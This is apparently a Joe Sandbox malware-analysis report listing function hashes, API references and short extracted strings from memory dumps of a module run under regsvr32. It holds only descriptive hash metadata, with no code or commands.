                                                                                                                                                • Opcode ID: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                                • Instruction ID: dc7706175a5312843a8777e394e8f3fa14b07e106f527f970d5396039d4f42ce
                                                                                                                                                • Opcode Fuzzy Hash: 31e1571c4c9480ce99c15a91898bfef815e3c9c5a1e04a4fd1e61da97386d0dc
                                                                                                                                                • Instruction Fuzzy Hash: 6F119B72A0C59AC5EB705B66E4B53F91391FF44B8CF444931DB8D46685DE2CD585C330
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                • Opcode ID: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                                • Instruction ID: fe967f13de712ecbc46088a5695e36b151ee059acb9e8362b8c4e9534fd33fe7
                                                                                                                                                • Opcode Fuzzy Hash: aeac2b72f960d353e04b1ec94d2b5deee2ea0aff83e9dab1063ee3790c567d86
                                                                                                                                                • Instruction Fuzzy Hash: 3D1118B2A0C619CBFB198A32C0693B927A1FF94B0DF184935C60D46286CF7CD594C6B9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EnumSystemLocalesA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FFC67205A8C), ref: 00007FFC6720C8FD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                • Opcode ID: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                                • Instruction ID: c7199293619bdfd8f44b85422b66176d984f6882000495a3f652877eee504e4d
                                                                                                                                                • Opcode Fuzzy Hash: 63a91a0b255d2a7e8e8559b933d18d41bbf72777b1d5725641a44dd385286e67
                                                                                                                                                • Instruction Fuzzy Hash: 3CF06DE2E0C51EC6F7188A22C4293FA23D1AF94B4CF188931CA4D42296DE6CD6D1C270
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3731964398-0
                                                                                                                                                • Opcode ID: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                                • Instruction ID: 4a84fe74fac14a6068e747aea84a491ce4d629389eeb1f3facb08580c9e7c08a
                                                                                                                                                • Opcode Fuzzy Hash: c55661bbe17e4b16f28eed47b7e85f9fabee07928079620ee3b979cc97ad5c67
                                                                                                                                                • Instruction Fuzzy Hash: A3F0BE22A086D0C3D710CB0AF04806AA760FBC4BE4F688221FB9D07B99CE2CC842CB40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                • Opcode ID: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                                • Instruction ID: b99c11982b706b8e5d6b1fc906a7fa36bd8c2f905bc64f2946679ea50409c6ed
                                                                                                                                                • Opcode Fuzzy Hash: 502a65142465a1b9b121244362b20e71b6ae70508435106b2b95459646a177ab
                                                                                                                                                • Instruction Fuzzy Hash: E4E0E561B0C685C2F630E722E8653AA2790FF9835CF800636D68C066A1DE2CD241CB20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                • Opcode ID: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                                • Instruction ID: 1bf7bb0c9ffbc40fa10e6c8fc1f3d81e761673dd6978c4c324bbf42a82455a7b
                                                                                                                                                • Opcode Fuzzy Hash: a3acadd2f008454ed6638a5ec196b6424420b15def5e390d94227f08142a8bc9
                                                                                                                                                • Instruction Fuzzy Hash: 54E04FA6E08649C3EB099B72D4583A82391EF94B0DF088431CA0C01195CF7CC5D6C660
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: cYte
                                                                                                                                                • API String ID: 0-489798635
                                                                                                                                                • Opcode ID: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                                                • Instruction ID: 4bcad34f3ef31740aa8133b8dde5a269bb367cd09133d205a83695970592d01c
                                                                                                                                                • Opcode Fuzzy Hash: 6004706ed1147b69530f76000c159dc057970e6c457d66b2cd8eae28b0101d69
                                                                                                                                                • Instruction Fuzzy Hash: C4B1E570904A0C9FCB99DFA8D4C96DDBFB1FB48354F908119F806AB294D774998ACF81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Pc
                                                                                                                                                • API String ID: 0-2609325410
                                                                                                                                                • Opcode ID: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                                • Instruction ID: 12b923e2fd3f69615379d54222b7898fdcc3de1fee72b8e179f5c4c977b11f8e
                                                                                                                                                • Opcode Fuzzy Hash: 1a0088ecf8094bc96bd3fe6dd6dc82c472572739438acd9534c77a0a59272c42
                                                                                                                                                • Instruction Fuzzy Hash: 4CC188B6502749CFCB88DF68C69A59E7BF1FF55308F004129FC0A9A660D374D929CB48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: g >
                                                                                                                                                • API String ID: 0-3862707646
                                                                                                                                                • Opcode ID: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                                • Instruction ID: 455282f08292131e945dcc730a648b96f9dba3dd8fa54dedd401ba7ae830fef0
                                                                                                                                                • Opcode Fuzzy Hash: ed648581161f49faafb3551504090fa0bdf2ce44a31b7bcfa2a0e2750c151a25
                                                                                                                                                • Instruction Fuzzy Hash: DEA1E5B1604649CFCB98DF28C4896DE7BE0FF48358F41412AFD0A9B255C774DAA8CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 2
                                                                                                                                                • API String ID: 0-2012265552
                                                                                                                                                • Opcode ID: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                                                • Instruction ID: 4926f2c2e7b01a1509be6dde787c5073208d3019f4660081853cabf743aa6d2d
                                                                                                                                                • Opcode Fuzzy Hash: 4b072a5d04a01b9100fac41699cb466bc37952194d83653627602ebfe7fd88fa
                                                                                                                                                • Instruction Fuzzy Hash: 23A1467490660CDFCB69DFA8C0856CDBBF2FF18344F1081AAE816A7261D774C619CB89
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Wcl
                                                                                                                                                • API String ID: 0-2623992880
                                                                                                                                                • Opcode ID: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                                • Instruction ID: 6785441b261b06c1a3a09f49601167733b22bb672c53a20dcfeae34723d14519
                                                                                                                                                • Opcode Fuzzy Hash: f4aab810873131842688b8816ae552eda5867b61779d557f5a81b893f1e00e3f
                                                                                                                                                • Instruction Fuzzy Hash: DCB17BB990364DCFCB68CF78D58A59D7BF1AF64308F204119FC259A266D3B0D629CB48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ws8
                                                                                                                                                • API String ID: 0-2196714860
                                                                                                                                                • Opcode ID: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                                • Instruction ID: b480ef2199d1fafa288ff61c3bcffdce570952497d21d470c9db593eaacbee88
                                                                                                                                                • Opcode Fuzzy Hash: 5d33fb8a3b51542eaa6130f047a5a21fcb70befd8ff2f8c5da0624ee0b386558
                                                                                                                                                • Instruction Fuzzy Hash: 54711A70A0470E8FDB59DFA8C45AAEFBBF2FB54348F004119D806A7291DB749A19CBC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: p/g
                                                                                                                                                • API String ID: 0-1786412500
                                                                                                                                                • Opcode ID: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                                                • Instruction ID: ede728f5e2ba0833d242d52ca27ad93f20c36497480e8c5f25a004cbad49378e
                                                                                                                                                • Opcode Fuzzy Hash: ea109bfccebd437b4b01984c5c0f8ff51e1effdcf135339ee94665a9e60d530a
                                                                                                                                                • Instruction Fuzzy Hash: F58108B050434E8FCB88DF68D88A6DE7FF0FB58358F105659E85A96250D3B8D694CF84
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: %
                                                                                                                                                • API String ID: 0-3714942587
                                                                                                                                                • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                                • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                                                                                                • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                                • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: A.}
                                                                                                                                                • API String ID: 0-2880059976
                                                                                                                                                • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                                • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                                                                                                • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                                • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0#
                                                                                                                                                • API String ID: 0-456275806
                                                                                                                                                • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                                                • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                                                                                                • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                                                • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: n)
                                                                                                                                                • API String ID: 0-1227437150
                                                                                                                                                • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                                • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                                                                                                • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                                • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: H&0
                                                                                                                                                • API String ID: 0-1691334370
                                                                                                                                                • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                                • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                                                                                                • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                                • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: <+o
                                                                                                                                                • API String ID: 0-2035106886
                                                                                                                                                • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                                • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                                                                                                • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                                • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 2d
                                                                                                                                                • API String ID: 0-3866551247
                                                                                                                                                • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                                • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                                                                                                • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                                • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ZF{;
                                                                                                                                                • API String ID: 0-2351138993
                                                                                                                                                • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                                • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                                                                                                • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                                • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: o^
                                                                                                                                                • API String ID: 0-3380573087
                                                                                                                                                • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                                • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                                                                                                • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                                • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 8N
                                                                                                                                                • API String ID: 0-1657423088
                                                                                                                                                • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                                • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                                                                                                • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                                • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: J3n
                                                                                                                                                • API String ID: 0-3694000235
                                                                                                                                                • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                                • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                                                                                                • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                                • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: c&A
                                                                                                                                                • API String ID: 0-649646960
                                                                                                                                                • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                                • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                                                                                                • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                                • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

